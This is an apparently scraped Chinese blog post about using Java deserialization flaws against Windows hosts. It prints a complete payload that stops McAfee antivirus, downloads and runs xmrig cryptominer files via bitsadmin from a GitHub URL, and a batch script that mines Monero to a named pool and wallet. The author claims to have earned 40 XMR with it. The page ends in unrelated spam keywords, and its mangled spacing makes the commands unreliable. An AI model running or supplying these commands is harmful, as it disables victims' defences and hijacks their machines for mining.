如何利用Java反序列化漏洞进行在Windows上的实验
发表于:2025-11-16 作者:千家信息网编辑
千家信息网最后更新 2025年11月16日,这期内容当中小编将会给大家带来有关如何利用Java反序列化漏洞进行在Windows上的实验,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。最近,安全社区中有很多人都在
千家信息网最后更新 2025年11月16日如何利用Java反序列化漏洞进行在Windows上的实验
这期内容当中小编将会给大家带来有关如何利用Java反序列化漏洞进行在Windows上的实验,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
最近,安全社区中有很多人都在讨论如何利用Java反序列化漏洞来攻击类似Apache、SOLR和WebLogic之类的系统。不说废话,我们直接进入正题。目前绝大多数的此类攻击针对的都是Linux/Unix系统,但是我近期发现了一种针对Windows系统的攻击方法。
攻击代码如下:
cmd /c net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;
实际的Payload分析
关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):
netstop "McAfee McShield;netstop mcafeeframework;
使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:
bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;
Batch脚本文件代码如下:
taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1
首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。
目前为止,这个挖矿程序的计算能力只能实现350哈希每秒,并为我挖到了40个门罗币(价值约为7000美元)。
上述就是小编为大家分享的如何利用Java反序列化漏洞进行在Windows上的实验了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。
攻击
序列
漏洞
代码
程序
系统
分析
实验
内容
文件
社区
脚本
资源
安全
接下来
专业
中小
价值
内容丰富
实际
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络技术咨询费是什么意思
凌华科技的服务器
公安局网络技术员工作时间
怎么查看邮箱的服务器
明星拍立得软件开发
单服务器 虚拟化
护网络安全构建和谐校园
工业软件开发专升本考什么
国产实时数据库与plc连接
软件开发公司一般做什么
联通网络安全部工作职责
苹果笔记本可以软件开发
软件开发有收益吗
高性能的聊天软件开发
5g网络安全思维
什么是负责数据库日常运转
尚学堂北京软件开发科技公司
软件开发 专科
福州软件开发总监应聘
数据库的分类及其特点
网络安全与管理真题
计算独立用户的数据库推荐
网吧连不上csgo服务器
西安软件开发招聘信
考哪个数据库证书比较好
怎么定位数据库链接被占用
软件开发从业 证书
用指令卡崩服务器
软件开发个人职责怎么写
网络安全知识4.15